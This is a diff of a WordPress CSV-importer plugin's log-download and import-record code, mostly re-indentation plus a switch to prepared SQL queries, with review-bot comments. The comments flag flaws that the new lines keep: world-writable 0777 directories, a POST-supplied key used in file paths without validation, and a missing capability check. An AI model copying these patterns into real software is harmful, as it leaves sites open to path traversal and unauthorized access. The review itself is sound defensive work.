-			echo wp_json_encode($response);
-			wp_die();
-
-		} else {
-
-
-			$results = $wpdb->get_results(
-				$wpdb->prepare(
+
+
+			if (file_exists($file_path)) {
+				// If the file already exists, return the file URL
+				$response['success'] = true;
+				$response['file_url'] = $file_url;
+				echo wp_json_encode($response);
+				wp_die();
+
+			} else {
+
+
+				$results = $wpdb->get_results(
+					$wpdb->prepare(
 						"SELECT  media_id, title, actual_url,file_url,file_name,caption,alt_text,description,status
 					 FROM " . $wpdb->prefix . "failed_media
 					 WHERE event_id = %s",
-					$get_event_key,
-
-				)
-			);
-			$json_posts = wp_json_encode($results);
-			$posts_array = json_decode($json_posts, true);
-
-			if (empty($posts_array)) {
-				$response['success'] = false;
-				$response['message'] = 'No posts found or failed to decode JSON.';
-				echo wp_json_encode($response);
-				wp_die();
-			}
+						$get_event_key,

-			$csv_file = fopen('php://temp', 'w');
-			if (!empty($posts_array)) {
-				fputcsv($csv_file, array_keys($posts_array[0]));
-			}
+					)
+				);
+				$json_posts = wp_json_encode($results);
+				$posts_array = json_decode($json_posts, true);

-			foreach ($posts_array as $post) {
-				fputcsv($csv_file, $post);
-			}
-			rewind($csv_file);
+				if (empty($posts_array)) {
+					$response['success'] = false;
+					$response['message'] = 'No posts found or failed to decode JSON.';
+					echo wp_json_encode($response);
+					wp_die();
+				}
+
+				$csv_file = fopen('php://temp', 'w');
+				if (!empty($posts_array)) {
+					fputcsv($csv_file, array_keys($posts_array[0]));
+				}
+
+				foreach ($posts_array as $post) {
+					fputcsv($csv_file, $post);
+				}
+				rewind($csv_file);

-			$csv_contents = stream_get_contents($csv_file);
-			fclose($csv_file);
+				$csv_contents = stream_get_contents($csv_file);
+				fclose($csv_file);

-			// Save the CSV data to the file
-			file_put_contents($file_path, $csv_contents);
+				// Save the CSV data to the file
+				file_put_contents($file_path, $csv_contents);

-			$response['success'] = true;
-			$response['file_url'] = $file_url;
-			echo wp_json_encode($response);
-			wp_die();
+				$response['success'] = true;
+				$response['file_url'] = $file_url;
+				echo wp_json_encode($response);
+				wp_die();
+			}
 		}
-	}
 	}

 	/**
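Review bot: `chmod($upload_dir, 0777)` in `download_media_log()` makes the log directory world-writable, and the directory name comes from `$get_event_key`, which is taken from `$_POST['hashkey']` after only `sanitize_text_field()`; that function does not remove path separators or `..`. Validate the key against the expected hash format (or look it up in `smackuci_events`) before building `$upload_dir`, and use 0755. `$event_key_result[0]->eventKey` is also read without checking that the query returned a row. The re-indentation leaves the `$hash_key=isset(...)` line one level shallower than its neighbours.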
@@ -304,18 +304,18 @@
 	// 	check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
 	// 	global $wpdb;
 	// 	$response = [];
-    //     $filename = sanitize_file_name($_POST['filename']);
-    //     $revision = sanitize_text_field($_POST['revision']);
+	//     $filename = sanitize_file_name($_POST['filename']);
+	//     $revision = sanitize_text_field($_POST['revision']);

-    //     $upload = wp_upload_dir();
-    //     $upload_dir = $upload['baseurl'];
-    //     $upload_url = $upload_dir . '/smack_uci_uploads/imports/failed_media_logs/';
-
-    //     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
+	//     $upload = wp_upload_dir();
+	//     $upload_dir = $upload['baseurl'];
+	//     $upload_url = $upload_dir . '/smack_uci_uploads/imports/failed_media_logs/';
+
+	//     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
 	// 	$get_event_key = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision , $filename));
 	// 	if(empty($get_event_key)) {
 	// 		$response['success'] = false;
-    //         $response['message'] = 'Log not exists';
+	//         $response['message'] = 'Log not exists';
 	// 	}
 	// 	else {
 	// 		$logPath = $upload_path .'failed_media_logs'.'/'.$get_event_key[0]->eventKey .'/failed_media_log.csv';
@@ -323,17 +323,17 @@
 	// 			$loglink = $upload_url .$get_event_key[0]->eventKey .'/'.'failed_media_log.csv';
 	// 			$response['success'] = true;
 	// 			$response['failed_log_link'] = $loglink;
-
+
 	// 		else :
 	// 			$response['success'] = false;
 	// 			$response['message'] = 'Log not exists';
-
+
 	// 		endif;
 	// 	}
-    //     echo wp_json_encode($response);
-    //     wp_die();
+	//     echo wp_json_encode($response);
+	//     wp_die();
 	// }
-
+

 	/**
 	 * Downloads file event log.
@@ -341,20 +341,20 @@
 	// public function download_log(){
 	// 	check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
 	// 	global $wpdb;
-
-    //     $response = [];
-    //     $filename = sanitize_file_name($_POST['filename']);
-    //     $revision = sanitize_text_field($_POST['revision']);
-
-    //     $upload = wp_upload_dir();
-    //     $upload_dir = $upload['baseurl'];
-    //     $upload_url = $upload_dir . '/smack_uci_uploads/imports/import_logs/';
-
-    //     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
+
+	//     $response = [];
+	//     $filename = sanitize_file_name($_POST['filename']);
+	//     $revision = sanitize_text_field($_POST['revision']);
+
+	//     $upload = wp_upload_dir();
+	//     $upload_dir = $upload['baseurl'];
+	//     $upload_url = $upload_dir . '/smack_uci_uploads/imports/import_logs/';
+
+	//     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
 	// 	$get_event_key = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision , $filename));
 	// 	if(empty($get_event_key)) {
 	// 		$response['success'] = false;
-    //         $response['message'] = 'Log not exists';
+	//         $response['message'] = 'Log not exists';
 	// 	}
 	// 	else {
 	// 		$logPath = $upload_path.'import_logs'.'/'.$get_event_key[0]->eventKey .'/';
@@ -363,22 +363,22 @@
 	// 			$loglink = $upload_url .$get_event_key[0]->eventKey .'/'.'summary_log.csv';
 	// 			$response['success'] = true;
 	// 			$response['log_link'] = $loglink;
-
+
 	// 		else :
 	// 			$response['success'] = false;
 	// 			$response['message'] = 'Log not exists';
-
+
 	// 		endif;
 	// 	}
-    //     echo wp_json_encode($response);
-    //     wp_die();
+	//     echo wp_json_encode($response);
+	//     wp_die();
 	// }

 	public function download_log() {
 		check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
-
+
 		global $wpdb;
-
+
 		$response = [];
 		$filename = sanitize_file_name($_POST['filename']);
 		$revision = isset($_POST['revision']) ? sanitize_text_field($_POST['revision']) : '';
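Review bot: `download_log()` gates the request only on `check_ajax_referer('smack-ultimate-csv-importer', 'securekey')`; no `current_user_can()` check appears in the lines shown before `$_POST['filename']` and `$_POST['revision']` are read. A nonce check does not establish privilege, so add a capability check directly after it, with the capability chosen to match who is allowed to run imports. `$_POST['filename']` is also read without the `isset()` guard that `$_POST['revision']` gets on the next line.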
@@ -386,8 +386,8 @@
 		$module  = sanitize_text_field($_POST['type']);
 		if(empty($hash_key)){
 			$event_key_result = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision, $filename));
-		$get_event_key = $event_key_result[0]->eventKey;
-
+			$get_event_key = $event_key_result[0]->eventKey;
+
 		}
 		else{
 			$get_event_key=$hash_key;
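Review bot: `$event_key_result[0]->eventKey` is dereferenced without checking that the prepared lookup returned a row, so an unknown `revision` / `original_file_name` pair reads index 0 of an empty result. Guard it with `!empty($event_key_result)` and leave `$get_event_key` empty otherwise, so the handler's empty-key branch deals with the miss.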
@@ -400,14 +400,14 @@
 		} else {

 			$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/summary_logs/' . $get_event_key . '/';
-
+
 			if (!is_dir($upload_dir)) {
 				if (!wp_mkdir_p($upload_dir)) {
 					return null;
 				}
 			}
 			chmod($upload_dir, 0777);
-
+
 			$index_file = $upload_dir . 'index.php';
 			if (!file_exists($index_file)) {
 				$index_content = '<?php' . PHP_EOL . '?>';
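Review bot: `chmod($upload_dir, 0777)` leaves the per-event log directory world-writable. `wp_mkdir_p()` already applies permissions derived from the parent directory, so this call should be dropped or tightened to 0755. The directory name is `$get_event_key`, which the preceding hunk shows can be `$hash_key` unchanged, so that value should be checked against the expected event-key format before it is concatenated into `$upload_dir`.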
@@ -419,18 +419,18 @@
 			$export_type = 'csv';
 			$file_path = $upload_dir . $baseFileName . '.' . $export_type;
 			$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/summary_logs/' . $get_event_key . '/' . $baseFileName . '.' . $export_type;
-
+
 			if (file_exists($file_path)) {
 				// If the file already exists, return the file URL
 				$response['success'] = true;
 				$response['file_url'] = $file_url;
 				echo wp_json_encode($response);
 				wp_die();
-
+
 			} else {
 				$cat_check = $wpdb->get_results($wpdb->prepare("SELECT * FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
 				foreach ($cat_check as $item) {
-
+
 					switch (strtolower($item->is_category)) {
 						case '1':
 							$found_category = true;
@@ -439,174 +439,172 @@
 							$found_tag = true;
 							break;

-							case '3':
-								$found_users = true;
-								break;
-								case '4':
-									$found_comment = true;
-									break;
-
+						case '3':
+							$found_users = true;
+							break;
+						case '4':
+							$found_comment = true;
+							break;
+
 					}
-
+
 				}
 				// category log
 				if (isset($found_category) && $found_category){
 					global $wpdb;
-
-						$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
-
-						if (!empty($cat_ids)) {
-
-							$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
-

-							$query = "SELECT * FROM " . $wpdb->prefix . "terms WHERE term_id IN ($placeholders)";
-							$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
-							foreach ($results as $result) {
-								$term_id = $result->term_id;
-
-								// Admin link
-								$admin_link = admin_url("term.php?taxonomy=category&tag_ID={$term_id}");
-
-								// Weblink
-								$site_url = get_site_url();
+					$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
+
+					if (!empty($cat_ids)) {
+
+						$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
+
+
+						$query = "SELECT * FROM " . $wpdb->prefix . "terms WHERE term_id IN ($placeholders)";
+						$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
+						foreach ($results as $result) {
+							$term_id = $result->term_id;
+
+							// Admin link
+							$admin_link = admin_url("term.php?taxonomy=category&tag_ID={$term_id}");
+
+							// Weblink
+							$site_url = get_site_url();
 								$term_link = trailingslashit($site_url) . 'index.php/'.'category/' . $result->slug . '/';
-
-								$result->admin_link = $admin_link;
-								$result->weblink = $term_link;
-							}
-
-					}
+
+							$result->admin_link = $admin_link;
+							$result->weblink = $term_link;
+						}
+
+					}
 				}
 				//tag log
 				elseif(isset($found_tag) && $found_tag){
 					global $wpdb;
-
-						$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
-
-						if (!empty($cat_ids)) {
-
-							$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
-

-							$query = "SELECT * FROM " . $wpdb->prefix . "terms WHERE term_id IN ($placeholders)";
-							$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
-							foreach ($results as $result) {
-								$term_id = $result->term_id;
-
-								// Admin link
-								$admin_link = admin_url("term.php?taxonomy=post_tag&tag_ID={$term_id}");
-
-								// Weblink
-								$site_url = get_site_url();
+					$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
+
+					if (!empty($cat_ids)) {
+
+						$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
+
+
+						$query = "SELECT * FROM " . $wpdb->prefix . "terms WHERE term_id IN ($placeholders)";
+						$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
+						foreach ($results as $result) {
+							$term_id = $result->term_id;
+
+							// Admin link
+							$admin_link = admin_url("term.php?taxonomy=post_tag&tag_ID={$term_id}");
+
+							// Weblink
+							$site_url = get_site_url();
 								$term_link = trailingslashit($site_url) . 'index.php/'.'tag/' . $result->slug . '/';
-
-								$result->admin_link = $admin_link;
-								$result->weblink = $term_link;
-							}
-
-					}
-
+
+							$result->admin_link = $admin_link;
+							$result->weblink = $term_link;
+						}
+
+					}
+
 				}
 				//users log
-				elseif(isset($found_users) && $found_users){
+				elseif (isset($found_users) && $found_users) {
 					global $wpdb;
-
+
 					$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));

 					if (!empty($cat_ids)) {
 						$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
-
+
 						// Query to get user information, including the ID
 						$query = "SELECT ID, user_login, user_nicename,display_name, user_email, user_url FROM " . $wpdb->prefix . "users WHERE ID IN ($placeholders)";
 						$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
-
-
-				}
+
+
+					}

 				}
 				//comment logs
-				elseif(isset($found_comment) && $found_comment){
+				elseif (isset($found_comment) && $found_comment) {
 					global $wpdb;
-
+
 					$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));

 					if (!empty($cat_ids)) {
 						$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
-
+
 						// Query to get user information, including the ID
 						$query = "SELECT comment_post_id, comment_author, comment_author_url,comment_content, comment_type FROM " . $wpdb->prefix . "comments WHERE comment_ID IN ($placeholders)";
 						$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
-

-				}
-			}

-				else{
+					}
+				} else {
 					global $wpdb;

-		$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
+					$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));

-		if (!empty($cat_ids)) {
-    	$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
+					if (!empty($cat_ids)) {
+						$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));

-   		 $query = "SELECT ID, post_type, post_title, post_content, post_excerpt, post_status, post_name, guid FROM " . $wpdb->prefix . "posts WHERE ID IN ($placeholders)";
-   		 $results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
+						$query = "SELECT ID, post_type, post_title, post_content, post_excerpt, post_status, post_name, guid FROM " . $wpdb->prefix . "posts WHERE ID IN ($placeholders)";
+						$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
+
+						$media_query = "SELECT post_id, associated_media, failed_media FROM " . $wpdb->prefix . "summary WHERE event_id = %s";
+						$media_results = $wpdb->get_results($wpdb->prepare($media_query, $get_event_key), OBJECT_K);
+
+						if ($media_results) {
+							foreach ($results as $result) {
+								if (isset($media_results[$result->ID])) {
+									$result->associated_media = $media_results[$result->ID]->associated_media;
+									$result->failed_media = $media_results[$result->ID]->failed_media;
+								} else {
+									$result->associated_media = null;
+									$result->failed_media = null;
+								}
+							}
+						} else {
+
+							foreach ($results as $result) {
+								$result->associated_media = null;
+								$result->failed_media = null;
+							}
+						}
+					} else {
+
+						$results = [];
+					}
+
+				}

-   		 $media_query = "SELECT post_id, associated_media, failed_media FROM " . $wpdb->prefix . "summary WHERE event_id = %s";
-   		 $media_results = $wpdb->get_results($wpdb->prepare($media_query, $get_event_key), OBJECT_K);
-
-    if ($media_results) {
-        foreach ($results as $result) {
-            if (isset($media_results[$result->ID])) {
-                $result->associated_media = $media_results[$result->ID]->associated_media;
-                $result->failed_media = $media_results[$result->ID]->failed_media;
-            } else {
-                $result->associated_media = null;
-                $result->failed_media = null;
-            }
-        }
-    } else {
-
-        foreach ($results as $result) {
-            $result->associated_media = null;
-            $result->failed_media = null;
-        }
-    }
-		} else {
-
-    $results = [];
-			}

-			}
-
-
 				$json_posts = wp_json_encode($results);
 				$posts_array = json_decode($json_posts, true);
-
+
 				if (empty($posts_array)) {
 					$response['success'] = false;
 					$response['message'] = 'No posts found or failed to decode JSON.';
 					echo wp_json_encode($response);
 					wp_die();
 				}
-
+
 				$csv_file = fopen('php://temp', 'w');
 				if (!empty($posts_array)) {
 					fputcsv($csv_file, array_keys($posts_array[0]));
 				}
-
+
 				foreach ($posts_array as $post) {
 					fputcsv($csv_file, $post);
 				}
 				rewind($csv_file);
-
+
 				$csv_contents = stream_get_contents($csv_file);
 				fclose($csv_file);
-
+
 				// Save the CSV data to the file
 				file_put_contents($file_path, $csv_contents);
-
+
 				$response['success'] = true;
 				$response['file_url'] = $file_url;
 				echo wp_json_encode($response);
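Review bot: `$results` is assigned only inside `if (!empty($cat_ids))` in the category, tag, users and comment branches, and only the final `else` branch falls back to `$results = [];`, so `wp_json_encode($results)` can run on an undefined variable when the summary lookup returns no IDs. Initialise `$results = [];` once before the `if (isset($found_category) ...)` chain. Two style points: the unchanged `$term_link = trailingslashit($site_url) ...` lines in the category and tag branches keep the old, deeper indentation and no longer line up with the re-indented code around them, and the comment above the `comments` query still reads "Query to get user information".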
@@ -614,257 +612,260 @@
 			}
 		}
 	}
-
-//failed media log download
-public function download_failed_log() {
-	check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
-
-	global $wpdb;
-
-	$response = [];
-	$filename = sanitize_file_name($_POST['filename']);
-	$revision = isset($_POST['revision']) ? sanitize_text_field($_POST['revision']) : '';
-	$hash_key=isset($_POST['hashkey'] ) ? sanitize_text_field($_POST['hashkey']) : '';
-	$module  = sanitize_text_field($_POST['type']);
-		if(empty($hash_key)){
+
+	//failed media log download
+	public function download_failed_log()
+	{
+		check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
+
+		global $wpdb;
+
+		$response = [];
+		$filename = sanitize_file_name($_POST['filename']);
+		$revision = isset($_POST['revision']) ? sanitize_text_field($_POST['revision']) : '';
+		$hash_key = isset($_POST['hashkey']) ? sanitize_text_field($_POST['hashkey']) : '';
+		$module = sanitize_text_field($_POST['type']);
+		if (empty($hash_key)) {
 			$event_key_result = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision, $filename));
-		$get_event_key = $event_key_result[0]->eventKey;
-
-		}
-		else{
-			$get_event_key=$hash_key;
-		}
-
-	if (empty($get_event_key)) {
-		$response['success'] = false;
-		$response['message'] = 'Log not exists';
-		echo wp_json_encode($response);
-		wp_die();
-	} else {
+			$get_event_key = $event_key_result[0]->eventKey;

-		$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/failed_media_logs/' . $get_event_key . '/';
-
-		if (!is_dir($upload_dir)) {
-			if (!wp_mkdir_p($upload_dir)) {
-				return null;
-			}
-		}
-		chmod($upload_dir, 0777);
-
-		$index_file = $upload_dir . 'index.php';
-		if (!file_exists($index_file)) {
-			$index_content = '<?php' . PHP_EOL . '?>';
-			file_put_contents($index_file, $index_content);
-			chmod($index_file, 0644);
+		} else {
+			$get_event_key = $hash_key;
 		}

-		$baseFileName = 'FailedMedia';
-		$export_type = 'csv';
-		$file_path = $upload_dir . $baseFileName . '.' . $export_type;
-		$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/failed_media_logs/' . $get_event_key . '/' . $baseFileName . '.' . $export_type;
-
-		if (file_exists($file_path)) {
-			// If the file already exists, return the file URL
-			$response['success'] = true;
-			$response['file_url'] = $file_url;
+		if (empty($get_event_key)) {
+			$response['success'] = false;
+			$response['message'] = 'Log not exists';
 			echo wp_json_encode($response);
 			wp_die();
-
 		} else {
-
-			if($module == 'Media'){
-				$results = $wpdb->get_results(
-					$wpdb->prepare(
-						"SELECT  media_id, title,file_name, caption,description,alt_text,actual_url,status ,file_url
-						 FROM " . $wpdb->prefix . "failed_media
-						 WHERE event_id = %s AND status = %s",
-						$get_event_key,
-						'failed'
-					)
-				);
+
+			$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/failed_media_logs/' . $get_event_key . '/';
+
+			if (!is_dir($upload_dir)) {
+				if (!wp_mkdir_p($upload_dir)) {
+					return null;
+				}
 			}
-			else{
-				$results = $wpdb->get_results(
-					$wpdb->prepare(
-						"SELECT  media_id,title,post_id,actual_url,status
-						 FROM " . $wpdb->prefix . "failed_media
-						 WHERE event_id = %s AND status = %s",
-						$get_event_key,
-						'failed'
-					)
-				);
+			chmod($upload_dir, 0777);
+
+			$index_file = $upload_dir . 'index.php';
+			if (!file_exists($index_file)) {
+				$index_content = '<?php' . PHP_EOL . '?>';
+				file_put_contents($index_file, $index_content);
+				chmod($index_file, 0644);
 			}
-
-			$json_posts = wp_json_encode($results);
-			$posts_array = json_decode($json_posts, true);
-
-			if (empty($posts_array)) {
-				$response['success'] = false;
-				$response['message'] = 'No posts found or failed to decode JSON.';
+
+			$baseFileName = 'FailedMedia';
+			$export_type = 'csv';
+			$file_path = $upload_dir . $baseFileName . '.' . $export_type;
+			$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/failed_media_logs/' . $get_event_key . '/' . $baseFileName . '.' . $export_type;
+
+			if (file_exists($file_path)) {
+				// If the file already exists, return the file URL
+				$response['success'] = true;
+				$response['file_url'] = $file_url;
 				echo wp_json_encode($response);
 				wp_die();
-			}

-			$csv_file = fopen('php://temp', 'w');
-			if (!empty($posts_array)) {
-				fputcsv($csv_file, array_keys($posts_array[0]));
-			}
+			} else {

-			foreach ($posts_array as $post) {
-				fputcsv($csv_file, $post);
-			}
-			rewind($csv_file);
+				if ($module == 'Media') {
+					$results = $wpdb->get_results(
+						$wpdb->prepare(
+							"SELECT  media_id, title,file_name, caption,description,alt_text,actual_url,status ,file_url
+						 FROM " . $wpdb->prefix . "failed_media
+						 WHERE event_id = %s AND status = %s",
+							$get_event_key,
+							'failed'
+						)
+					);
+				} else {
+					$results = $wpdb->get_results(
+						$wpdb->prepare(
+							"SELECT  media_id,title,post_id,actual_url,status
+						 FROM " . $wpdb->prefix . "failed_media
+						 WHERE event_id = %s AND status = %s",
+							$get_event_key,
+							'failed'
+						)
+					);
+				}
+
+				$json_posts = wp_json_encode($results);
+				$posts_array = json_decode($json_posts, true);
+
+				if (empty($posts_array)) {
+					$response['success'] = false;
+					$response['message'] = 'No posts found or failed to decode JSON.';
+					echo wp_json_encode($response);
+					wp_die();
+				}
+
+				$csv_file = fopen('php://temp', 'w');
+				if (!empty($posts_array)) {
+					fputcsv($csv_file, array_keys($posts_array[0]));
+				}

-			$csv_contents = stream_get_contents($csv_file);
-			fclose($csv_file);
+				foreach ($posts_array as $post) {
+					fputcsv($csv_file, $post);
+				}
+				rewind($csv_file);

+				$csv_contents = stream_get_contents($csv_file);
+				fclose($csv_file);

-			// Save the CSV data to the file
-			file_put_contents($file_path, $csv_contents);

-			$response['success'] = true;
-			$response['file_url'] = $file_url;
-			echo wp_json_encode($response);
-			wp_die();
+				// Save the CSV data to the file
+				file_put_contents($file_path, $csv_contents);
+
+				$response['success'] = true;
+				$response['file_url'] = $file_url;
+				echo wp_json_encode($response);
+				wp_die();
+			}
 		}
 	}
-}


 	/**
 	 * Saves event logs in database.
 	 * @param  string $hash_key - File hash key
-     * @param  string $selected_type - Post type
+	 * @param  string $selected_type - Post type
 	 * @param  string $file_name - File name
 	 * @param  string $total_rows - Total rows in file
 	 */
-    public function manage_records($hash_key ,$selected_type , $file_name , $total_rows){
-        global $wpdb;
-        $log_table_name = $wpdb->prefix ."import_detail_log";
-
-        $file_extension = pathinfo($file_name, PATHINFO_EXTENSION);
-        $file_extn = '.' . $file_extension;
-        $get_local_filename = explode($file_extn, $file_name);
-        $extension_object = new ExtensionHandler;
-        $import_type = $extension_object->import_name_as($selected_type);
+	public function manage_records($hash_key, $selected_type, $file_name, $total_rows)
+	{
+		global $wpdb;
+		$file_name = sanitize_file_name($file_name);
+		$log_table_name = $wpdb->prefix . "import_detail_log";

-        $imported_on = date('Y-m-d h:i:s');
+		$file_extension = pathinfo($file_name, PATHINFO_EXTENSION);
+		$file_extn = '.' . $file_extension;
+		$get_local_filename = explode($file_extn, $file_name);
+		$extension_object = new ExtensionHandler;
+		$import_type = $extension_object->import_name_as($selected_type);
+
+		$imported_on = date('Y-m-d h:i:s');
 		$month = date("M", strtotime($imported_on));
-        $year = date("Y", strtotime($imported_on));
-        $file_path = '/smack_uci_uploads/imports/' . $hash_key . '/' . $hash_key;
-
-        $get_name = $wpdb->get_results( "SELECT original_file_name FROM {$wpdb->prefix}smackuci_events " );
+		$year = date("Y", strtotime($imported_on));
+		$file_path = '/smack_uci_uploads/imports/' . $hash_key . '/' . $hash_key;
+
+		$get_name = $wpdb->get_results("SELECT original_file_name FROM {$wpdb->prefix}smackuci_events ");

-        if(!empty($get_name)){
-			foreach($get_name as $name_values){
+		if (!empty($get_name)) {
+			foreach ($get_name as $name_values) {
 				$inserted_name_values[] = $name_values->original_file_name;
-            }
-            if(in_array($file_name , $inserted_name_values)){
-                $get_revision = $wpdb->get_results( "SELECT revision FROM {$wpdb->prefix}smackuci_events WHERE original_file_name = '$file_name' " );
-				foreach($get_revision as $value){
-                    $last_version_id = $value->revision;
-                }
-                $revision = $last_version_id + 1;
-                $name = $get_local_filename[0] .'-'. $revision . $file_extn;
-            }
-			else{
-                $name = $get_local_filename[0] . '-1' . $file_extn;
-                $revision = 1;
-            }
-        }
-        else{
-            $name = $get_local_filename[0] . '-1' . $file_extn;
-            $revision = 1;
-        }
+			}
+			if (in_array($file_name, $inserted_name_values)) {
+				$get_revision = $wpdb->get_results($wpdb->prepare("SELECT revision FROM {$wpdb->prefix}smackuci_events WHERE original_file_name = %s ", $file_name));
+				foreach ($get_revision as $value) {
+					$last_version_id = $value->revision;
+				}
+				$revision = $last_version_id + 1;
+				$name = $get_local_filename[0] . '-' . $revision . $file_extn;
+			} else {
+				$name = $get_local_filename[0] . '-1' . $file_extn;
+				$revision = 1;
+			}
+		} else {
+			$name = $get_local_filename[0] . '-1' . $file_extn;
+			$revision = 1;
+		}

-        $get_data =  $wpdb->get_results("SELECT skipped , created , updated,failed FROM $log_table_name WHERE hash_key = '$hash_key' ");
+		$get_data = $wpdb->get_results($wpdb->prepare("SELECT skipped , created , updated,failed FROM $log_table_name WHERE hash_key = %s ", $hash_key));
 		$skipped_count = $get_data[0]->skipped;
-			$created_count = $get_data[0]->created;
-			$updated_count = $get_data[0]->updated;
-			$failed_count = $get_data[0]->failed;
-			$processed = $created_count + $updated_count + $skipped_count;
-			if($processed > $total_rows)
-				$processed = $created_count;
-
-		$smack_uci_table = $wpdb->prefix."smackuci_events";
-
-		$getid = $wpdb->get_results("SELECT distinct( id ) from {$wpdb->prefix}smackuci_events where import_type = '$import_type' and eventKey = '$hash_key'",ARRAY_A);
-		if(!empty($getid)){
-			$wpdb->update($smack_uci_table, array(
-				'created' => "{$created_count}",
-				'updated' => "{$updated_count}",
-				'skipped' => "{$skipped_count}",
-				'failed' => "{$failed_count}",
-				'processed' => "{$processed}",
-				'last_activity' => "{$imported_on}",
-				),
+		$created_count = $get_data[0]->created;
+		$updated_count = $get_data[0]->updated;
+		$failed_count = $get_data[0]->failed;
+		$processed = $created_count + $updated_count + $skipped_count;
+		if ($processed > $total_rows)
+			$processed = $created_count;
+
+		$smack_uci_table = $wpdb->prefix . "smackuci_events";
+
+		$getid = $wpdb->get_results($wpdb->prepare("SELECT distinct( id ) from {$wpdb->prefix}smackuci_events where import_type = %s and eventKey = %s", $import_type, $hash_key), ARRAY_A);
+		if (!empty($getid)) {
+			$wpdb->update(
+				$smack_uci_table,
+				array(
+					'created' => "{$created_count}",
+					'updated' => "{$updated_count}",
+					'skipped' => "{$skipped_count}",
+					'failed' => "{$failed_count}",
+					'processed' => "{$processed}",
+					'last_activity' => "{$imported_on}",
+				),
 				array('id' => $getid[0]['id'])
 			);
+		} else {
+			$wpdb->insert(
+				$smack_uci_table,
+				array(
+					'revision' => $revision,
+					'name' => "{$name}",
+					'original_file_name' => "{$file_name}",
+					'import_type' => "{$import_type}",
+					'filetype' => "{$file_extension}",
+					'filepath' => "{$file_path}",
+					'eventKey' => "{$hash_key}",
+					'registered_on' => $imported_on,
+					'processing' => 1,
+					'count' => $total_rows,
+					'processed' => $created_count,
+					'created' => $created_count,
+					'updated' => $updated_count,
+					'skipped' => $skipped_count,
+					'failed' => $failed_count,
+					'last_activity' => $imported_on,
+					'month' => $month,
+					'year' => $year
+				),
+				array('%d', '%s', '%s', '%s', '%s', '%s', '%s', '%d', '%d', '%d', '%d', '%d', '%d', '%s', '%s', '%s')
+			);
 		}
-		else {
-        $wpdb->insert($smack_uci_table, array(
-            'revision' => $revision,
-            'name' => "{$name}",
-            'original_file_name' => "{$file_name}",
-            'import_type' => "{$import_type}",
-            'filetype' => "{$file_extension}",
-            'filepath' => "{$file_path}",
-            'eventKey' => "{$hash_key}",
-            'registered_on' => $imported_on,
-            'processing' => 1,
-            'count' => $total_rows,
-            'processed' => $created_count,
-            'created' => $created_count,
-            'updated' => $updated_count,
-            'skipped' => $skipped_count,
-			'failed' => $failed_count,
-            'last_activity' => $imported_on,
-            'month' => $month,
-            'year' => $year
-        ),
-            array('%d', '%s', '%s', '%s', '%s', '%s', '%s', '%d', '%d', '%d', '%d', '%d', '%d', '%s','%s','%s')
-		);
 	}
-    }
 	/**
 	 * insert log file log.
 	 */
-	public function Insert_log_details($data, $line_number, $hash_key) {
+	public function Insert_log_details($data, $line_number, $hash_key)
+	{
 		if (empty($data)) {
 			return null; // Exit function if data is empty
 		}
-		if(!isset($data[$line_number]) || !is_array($data[$line_number])){
+		if (!isset($data[$line_number]) || !is_array($data[$line_number])) {
 			$line_number = $line_number - 1;
-			if(!isset($data[$line_number]) || !is_array($data[$line_number])){
